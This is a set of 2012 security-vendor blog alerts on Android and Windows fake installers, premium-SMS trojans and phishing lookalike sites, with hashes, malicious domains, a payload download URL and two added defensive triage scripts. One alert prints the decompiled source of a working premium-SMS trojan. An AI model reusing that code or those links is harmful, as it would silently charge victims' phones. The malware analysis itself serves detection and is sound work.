[ Security Alert ] 30 July, 2012 15:16

    Last week, AegisLab found a strange domain name: hxxp://adobe-upgrade.org/w.php?f=28f52. Does it look like an official Adobe domain name?! Actually, it's not! It was registered by an attacker in order to trick victims into downloading a malicious program. After analyzing the program in depth, we found it is a fake AV. Once fully installed, it shows you a virus scanning page (Figure 1) and reports how many files on this computer are infected. It's all fake, but you will really get infected after the "scanning" finishes :-)

   VirusTotal details

SHA256: e69d29b7b09449e64474b0caed08461f527b9ce1577f95f4ef3409e7424d5e36
SHA1: b0742f1f07e30620d0643029375786873d897177
MD5: 4c57cf16bbe1e1f5e8e38b3773f5e07a
File size: 404.0 KB ( 413696 bytes )
File name: about.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 7 / 41
Analysis date: 2012-07-23 05:55:56 UTC 


Figure 1: Fake virus scan page


by AegisLab 

[ Security Alert ] 27 July, 2012 10:18

    AegisLab discovered a fake Adobe Flash Player app in a 3rd-party market in Russia. Actually, it's a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS), which tricks the victim into downloading and installing it and then sends SMS to premium-rate numbers. The VirusTotal detection rate is shown below:

SHA256: 95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225
SHA1: a04718f91e86ee6619f910c76509c0e16724c356
MD5: 0d8d9ad5a98ce9d77462779036cf0295
File size: 317.0 KB ( 324634 bytes )
File name: adobe_flash_player_v10.3.185.25_installer.apk
File type: Android
Tags: android
Detection ratio: 2 / 41
Analysis date: 2012-07-26 06:47:48 UTC
After analyzing this malicious app and checking the complex hyperlinks inside it in depth, we found that the following Android markets (or websites) are all malicious; they host many malicious APKs (some are normal):
  • androidmir.com and android-mir.com (Figure 1)
  • myadroidmaklet.net (Figure 2)
  • filedats.net (Figure 3)
  • file77mibi.net
  • androidmarkt.ru

Figure 1: androidmir.com


Figure 2: myadroidmaklet.net


Figure 3: filedats.net


How did we find the above malicious websites? One day, while our WebGuard Team was patrolling the Internet, a researcher found a suspicious link to an Android APK called "Cool Reader". The link is not simple and direct: it redirects you to another page and then jumps to another site in order to evade detection and tracking. Once you install the app completely, the fake app issues an urgent update notification which tricks you into downloading another app. The following figures show the whole trick:

Figure 4: Cool Reader


Figure 5: fake installation process


Figure 6: fake disclaimer (can you see the notification on the upper-left corner?)


Figure 7: try to download another app


Figure 8: fake login page (just pressing Enter is OK)


Figure 9: lures you to the link http://androidmir.com/download/cr3-0-45-07.apk (the link does not exist)


Figure 10: the urgent update notification for Adobe Flash Player


Figure 11: connect to myadroidmaklet.net


While you are installing the fake Adobe Flash Player, you will see that it requires the read/send SMS, read contact data and read GPS location permissions (Figures 12, 13). Actually, the real Adobe Flash Player doesn't need such permissions.

Figure 12,13: fake Adobe Flash Player


Once the installation is complete, you will find a shortcut on the desktop. After clicking it, a "Browser" app is downloaded and installed (Figures 14, 15). The "Browser" app requires the same permissions as the fake Adobe Flash Player (Figures 16, 17).


Figure 14,15: update browser? (just a trick)


Figure 16,17: fake Browser
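The permission profile described above (SMS sending plus contacts or location on an app that claims to be a player or browser) can be checked statically from a decoded AndroidManifest.xml. The script below is an added example, not AegisLab code; the two manifests in it are constructed for the demonstration and the package names are placeholders.

```python
import xml.etree.ElementTree as ET

# Namespace used by android:name attributes in a decoded AndroidManifest.xml
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permission groups matching what the post observed on the fake Flash Player
# and on the follow-up "Browser" app: read/send SMS, contacts, GPS location.
SMS_PERMS = {"android.permission.SEND_SMS", "android.permission.READ_SMS",
             "android.permission.RECEIVE_SMS"}
CONTACT_PERMS = {"android.permission.READ_CONTACTS"}
LOCATION_PERMS = {"android.permission.ACCESS_FINE_LOCATION",
                  "android.permission.ACCESS_COARSE_LOCATION"}

def requested_permissions(manifest_xml):
    """Return the set of <uses-permission android:name="..."/> values."""
    root = ET.fromstring(manifest_xml)
    return {node.get(ANDROID_NS + "name")
            for node in root.iter("uses-permission")
            if node.get(ANDROID_NS + "name")}

def fakeinst_profile(manifest_xml):
    """Match the requested permissions against the FakeInst profile above."""
    perms = requested_permissions(manifest_xml)
    hit = {"sms": sorted(perms & SMS_PERMS),
           "contacts": sorted(perms & CONTACT_PERMS),
           "location": sorted(perms & LOCATION_PERMS)}
    # Suspicious when the app can send SMS and also reads contacts or
    # location: a player/installer style app has no reason to do both.
    hit["suspicious"] = ("android.permission.SEND_SMS" in perms
                         and bool(hit["contacts"] or hit["location"]))
    return hit

# Constructed manifests for demonstration (not extracted from the real samples).
FAKE_FLASH_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakeflash">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.player">
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""

if __name__ == "__main__":
    print(fakeinst_profile(FAKE_FLASH_MANIFEST))
    print(fakeinst_profile(BENIGN_MANIFEST))
```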


Yes, this kind of attack is old-fashioned and nothing special, but Android users keep being tricked. AegisLab reminds you to only download apps from trusted Android markets, never click suspicious links, and install AegisLab Antivirus :-)

By AegisLab 


[ Security Alert ] 24 July, 2012 18:15

    AegisLab discovered a Russian website called "google-file.com" which has a Google-style look (Figure 1). But actually it's not an official Google service; it's a premium-rate SMS scam website. If you want to download some files (Figure 2), you have to enter your phone number (Figure 3) first, and then the page tells you to send texts to a specific number in order to verify your identity (Figure 4). Finally, your money flies away (Figure 5).


Figure 1: Google-File.com


Figure 2: File to download


Figure 3: Input your phone number


Figure 4: Send premium-rate SMS to specific number


Figure 5: so many complaints to google-file.com


We also found that "google-fiile.mk3k.ru", "google-fille.org" and "google-fiile.org" redirect to Google-File.com. AegisLab WebGuard has blocked all 4 websites!


By AegisLab


[ Security Alert ] 20 July, 2012 14:33

    Last week, AegisLab published 「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, in which we mentioned that the 2nd-stage infection tries to download an apk called "Activator.apk". The code snippet is listed below (the key lines were marked in red):

package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.content.DialogInterface;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity {
    TelephonyManager TM;
    AlertDialog.Builder builder;
    String operator;

    // Sends one SMS with no sent/delivery intents, so the user sees nothing.
    private void sendSMS(String paramString1, String paramString2) {
        SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
    }

    protected void onCreate(Bundle paramBundle) {
        super.onCreate(paramBundle);
        this.TM = (TelephonyManager) getSystemService("phone");
        // The first three letters of the SIM operator name select the premium-rate number.
        this.operator = this.TM.getSimOperatorName();
        if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3))) {
            int k = 1 + new Random().nextInt(10000);
            startProgress("1518", "DEF1773");
            startProgress("3170", "4037" + k);
        }
        if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3))) {
            int j = 1 + new Random().nextInt(10000);
            startProgress("770656", "DEF1773");
            startProgress("3170", "4037" + j);
        }
        if (this.operator.equalsIgnoreCase("")) {
            // Empty operator name: show a fake "wallpaper database" error;
            // pressing OK still sends the 3170 message.
            this.builder = new AlertDialog.Builder(this);
            this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
            this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener() {
                public void onClick(DialogInterface paramDialogInterface, int paramInt) {
                    int i = 1 + new Random().nextInt(10000);
                    startProgress("3170", "4037" + i);
                }
            });
            this.builder.show();
        }
    }

    // Sends the SMS from a background thread.
    public void startProgress(final String number, final String message) {
        new Thread(new Runnable() {
            public void run() {
                ActivatorActivity.this.sendSMS(number, message);
            }
        }).start();
    }
}

Basically, it sends different messages to different numbers depending on the SIM operator name:

operator = OperatorName()

Case 1: Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
    number=1518, message="DEF1773"
    number=3170, message="4037" + 1~10000 (random number)

Case 2: Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
    number=770656, message="DEF1773"
    number=3170, message="4037" + 1~10000 (random number)

Case 3 (neither case 1 nor case 2, and OperatorName is not empty):
    number=3170, message="4037" + 1~10000 (random number)

If operatorName is empty, an alert dialog pops up: "Ошибка при загрузке базы обоев. Попробуйте позже." (Google translation: "Failed to load base wallpaper. Please try again later")

Because "Super Mario Bros." is masqueraded as a wallpaper app, this message just tricks you.
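When triaging a decompiled sample like the one above, the useful output is the list of hard-coded short codes, message bodies and the operator checks that select them, so they can be blocked and compared with other samples. The script below is an added example, not AegisLab code; it keys on this sample's startProgress wrapper, and the source excerpt in it is constructed from the literals listed in the post.

```python
import re

# Constructed excerpt in the style of the decompiled Activator code above;
# the literals are the ones listed in the post, the layout is ours.
SAMPLE_SOURCE = '''
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3))) {
    startProgress("1518", "DEF1773");
    startProgress("3170", "4037" + k);
}
if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3))) {
    startProgress("770656", "DEF1773");
    startProgress("3170", "4037" + j);
}
'''

# Sending API, hard-coded (number, message) pairs, and operator-name checks.
SEND_CALL = re.compile(r'\bsendTextMessage\s*\(')
TARGET_CALL = re.compile(r'startProgress\(\s*"(\d+)"\s*,\s*"([^"]*)"(\s*\+\s*\w+)?')
OPERATOR_CHECK = re.compile(r'Pattern\.matches\(\s*"([^"]+)"\s*,\s*this\.operator')

def triage_sms_sender(source):
    """Summarise hard-coded SMS targets found in decompiled Java source.

    Returns None when sendTextMessage is never called. Otherwise returns the
    short codes, the message bodies per code (a trailing '+' marks a variable
    suffix such as "4037" + k) and the operator-name regexes that select them.
    """
    if not SEND_CALL.search(source):
        return None
    targets = {}
    for number, body, suffix in TARGET_CALL.findall(source):
        targets.setdefault(number, set()).add(body + ("+" if suffix else ""))
    return {
        "short_codes": sorted(targets, key=int),
        "messages": {n: sorted(b) for n, b in targets.items()},
        "operator_checks": OPERATOR_CHECK.findall(source),
    }

if __name__ == "__main__":
    print(triage_sms_sender(SAMPLE_SOURCE))
```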

By AegisLab


[ Security Alert ] 12 July, 2012 17:57

    According to Symantec and F-Secure blogs, a malicious "Super Mario Bros." app appeared in Google Play for several days. It looks like an action game, but after installation completes, the icon displays "Mario HD Wallpaper" as in Figure 2. Google Play has removed this app and some related apps from the same developer, but you can still find the apps in 3rd-party markets as in Figure 1. This app uses a 2-stage or multi-stage infection technique in order to evade Google Play review. Simply speaking, the first-stage app is usually harmless, but the second stage downloads malicious content or another malicious apk and installs it.

In this app (Super Mario Bros.), we found 3 Dropbox links that are malicious; they all point to (http://dl.dropbox.com/u/87265868/Activator.apk)!


Obviously, you can see that the second stage downloads "Activator.apk" and installs it. After installation completes, "Activator" is launched, sends premium-rate SMS (targeting the Eastern European area) and finally uninstalls itself.

Figure 1: We discovered it on 3rd-party market.


Figure 2: "Mario HD Wallpaper"


Figure 3: Russian disclaimer


Figure 4: Russian disclaimer


Figure 5: AegisLab Antivirus detected

VirusTotal detection rate:

According to the developer information, AegisLab discovered 5 related apps from the same developer, and AegisLab Antivirus can detect them all.

By AegisLab 

[ Security Alert ] 12 July, 2012 13:55

    Remember the security alert we published before, 「Security Alert 2012-05-29: Facebook URL Hijacking」? AegisLab discovered that the website style of facenook.com and facevook.com now looks even more similar to the official FB website, as in Figure 1.

Figure 1: Looks so similar to the Facebook style

Once you get into the page, you will hear a recorded voice as follows:
"You have been selected to take part in our anonymous survey! 
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."

Click the "Start" button and then fill in the answers:

Figure 2: Answer the questions


After answering all 5 questions, a Best Buy and Walmart gift card prize page pops up as in Figure 3. (Don't even think about it, you'll never win the prize!)

Figure 3: Choose the gift card


After choosing the gift card you want, you have to input your cell phone number and e-mail address as in Figure 4. (OMG! Don't do that!)

Figure 4: Fill in cell phone number and e-mail address

Congratulations! You have finished the questionnaire, but all in vain, except for leaking your sensitive information (and you will get more spam :-) )


By AegisLab
